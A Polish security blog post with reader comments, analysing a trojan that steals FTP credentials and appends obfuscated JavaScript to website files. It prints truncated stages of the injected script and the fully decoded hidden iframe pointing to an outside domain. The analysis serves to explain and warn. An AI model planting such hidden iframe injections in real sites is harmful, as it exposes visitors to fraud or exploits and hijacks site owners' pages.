O ataku, który po zainfekowaniu komputera przejmuje konta FTP (podsłuch sieci oraz zapisane hasła w programach FTP), a następnie loguje się na te konta i dokleja kod JavaScript, który robi coś pisałem już kiedyś i to nawet dwa razy. Temat wraca szerokim łukiem, a piszę szerokim dlatego, że w przeciągu ostatnich kilku tygodni miałem do czynienia z podobnymi przypadkami z zupełnie różnych miejsc co oznacza, że ktoś znów się stara, a metoda nadal działa.
O tym, że na czyjejś stronie pojawił się dziwny kod informowali mnie na przykład ludzie, których powiadomił program antywirusowy. To dobry znak – po pierwsze w aplikacjach antywirusowych umieszczane są analizatory treści witryn, które potrafią w jakimś tam stopniu reagować na pojawiające się trendy. Po drugie – użytkownicy zaczynają sobie zdawać sprawę z istnienia tego typu problemów i świadomie informują o tego typu przypadkach. Oczywiście nie będzie tak zawsze :] Ostatnio natrafiłem jednak na bardzo interesujący przypadek, gdyż zarażone zostały komputery firmy, która zajmuje się pozycjonowaniem serwisów (małych i dużych serwisów, a w dużych klientach były naprawdę spore firmy). Pozycjonując strony, posiadali dostęp do kont FTP obsługujących naprawdę dużych klientów i jakieś złośliwe oprogramowanie musiało się bardzo ucieszyć. Warto w takiej sytuacji zastanowić się, a raczej pamiętać, że może dojść do takiej sytuacji i jeśli oddajemy komuś pieczę nad częścią naszej witryny WWW to włada on po części naszą reputacją i może wyrządzić wiele szkód.
Wracając do technikaliów sprawy miały się miej więcej tak. Trojan, który zdobywał hasło przekazywał je dalej do szefostwa, które dystrybuowało te dane do sieci botnet. Następnie z różnych komputerów (rózne adresy IP o różnych porach) dokonywane były połączenia na przejęte konta FTP. Pobierane były pliki index.php, index.html, index.htm, .htaccess (standard w takich przypadkach), ale także na przykład pliki typu main.php co oznacza, że od ostatnich przypadków, o których pisałem doszło do delikatnych zmian. Ponadto trojan przeglądał całe drzewo katalogów, czasami przechodząc ponad 6 katalogów w głąb w poszukiwaniu plików, które mógłby zarazić. To także więcej niż poprzednio (maksymalnie 2 katalogi wgłąb). Jeśli pobierane pliki zawierały w sobie zainfekowany kod nie była wykonywana żadna akcja, jeśli natomiast tego kodu nie zawierały – kod został doklejany, a pliki wysyłane na serwer. Co 2 – 3 dni z różnych adresów IP następowały połączenia sprawdzające czy pliki nadal posiadają zainfekowane treści. Przypadki były różne, od takich, które poprzez kilka domen kierowały do różnych exploitów próbujących poprzez błędy w przeglądarce internetowej zainstalować złośliwe oprogramowanie po takie, które wyświetlały ukryte okno (iframe) i odwiedzały w tym oknie legalną witrynę, a do tego witrynę polską i od tego przypadku zacznę analizę.
Załączony kod JavaScript wyglądał tak:
65.substr(i499d21978a737,i499d21978ab1e()))));}return i499d21978a363;} var r19='';va i499d21978b6d4='3C7'+r19+'3637'+r19+'2697'+r19+'07'+r19+ rd7+'43....
Plik z pełną zawartością kodu: javascript_malware_ekskluzywna_com_pl_zaciemniony_1.txt
Po odkodowaniu dostajemy następujące dane (nadal zakodowane):
<script>if(!myia){document.write(unescape('%3c%69%66%72%
61%6d%65%20%6e%61%6d%65%3d%63%32%36%20%73%72%63%3d
%27%68%74%74%70%3a%2f%2f%65%6b%73%6b%6c%75%7a%79%7
7%6e%61%2e%63%6f%6d%2e...
Plik z pełną zawartością kodu: javascript_malware_ekskluzywna_com_pl_zaciemniony_2.txt
I ponownie po odkodowaniu dostajemy następujące dane (już rozkodowane):
<iframe name=c26 src=’http://ekskluzywna.com.pl/?’+Math.round(Math.random()*117208)+’f7fe9d’ width=644 height=182 style=’visibility:hidden’></iframe>
Co my tu mamy. Otwarcie niewidzialnego okienka ze stroną: ekskluzywna.com.pl – WOW – polska strona. Nie ma się jawnie wyświetlać więc albo na stronie ekskluzywna.com.pl będzie znajdował się inny kod atakujący (aktualnie takiego tam nie widzę) albo takie przekierowanie ma za zadanie podnieść licznik odwiedzających. Dość zawiła i dziwna sytuacja…
Jeśli ktoś ma pomysł lub wie więcej, zapraszamy do podzielenia się komentarzem :] Moim skromnym zdaniem stały ciąg znaków f7fe9d doklejany do każdego zapytania może oznaczać określonego użytkownika, który otrzymuje profity za sprowadzanie ruchu na stronę klienta. Zasadniczo takie działanie to zwykłe oszustwo, gdyż mimo, że nabija licznik odwiedzin, tak naprawdę nie sprowadza użytkownika na stronę (nie jest ona wyświetlana w oknie przeglądarki w widoczny sposób).
Napisałem do firmy ekskluzywna.com.pl i otrzymałem odpowiedź, iż ich strona została zaatakowana przez doklejenie złośliwego kodu. Dlatego inne strony przekierowywały na ich stronę !!! I chodź sądzę, że patrząc od strony atakujących lepiej byłoby umieszczać na każdej przejętej stronie atakowany kod, to taka centralna obsługa ma także swoje zalety. Wystarczy posiadać kontrolę wyłącznie w centralnym miejscu i zmienić kod w tym jednym miejscu, a pozostałe przekierowania zajmą się resztą. Na tę chwilę witryny są czyste i zapraszamy do sprawienia miłych prezentów naszym ukochanym :] (nie, nie dostałem pary bokserek od nich w prezencie, mam dziś po prostu romantyczny nastrój :)
3 komentarze do
19 marca, 2009 o godzinie 03:02
Pierwszego txt nie mogę otworzyć, gdyż nod32 widzi w nim jakiegoś trojana. Ale nie rozumiem po co jest w tym złośliwego? Gdyż jak dobrze zrozumiałem jedynym celem wszystkich zarażonych stron, było logowanie się do strony centralnej z informacją iż dalej żyję.
Czy coś jeszcze?
19 marca, 2009 o godzinie 08:36
Sprawa z niektórymi autorami malware’u ostatnio wygląda tak, że najpierw wysyłają testowy malware który sprawdza czy infekcje działają, czy trojan umie się łączyć ze stroną matką, etc, a dopiero po jakimś czasie na sieć trafia ten sam trojanik z dopisaną dodatkową funkcjonalnością która robi ZUE rzeczy.
Więc może to po prostu wersja beta trojana? ;>
19 marca, 2009 o godzinie 13:59
ciekawe w jakim stopniu fotka wpłynęła na ocene newsa ;)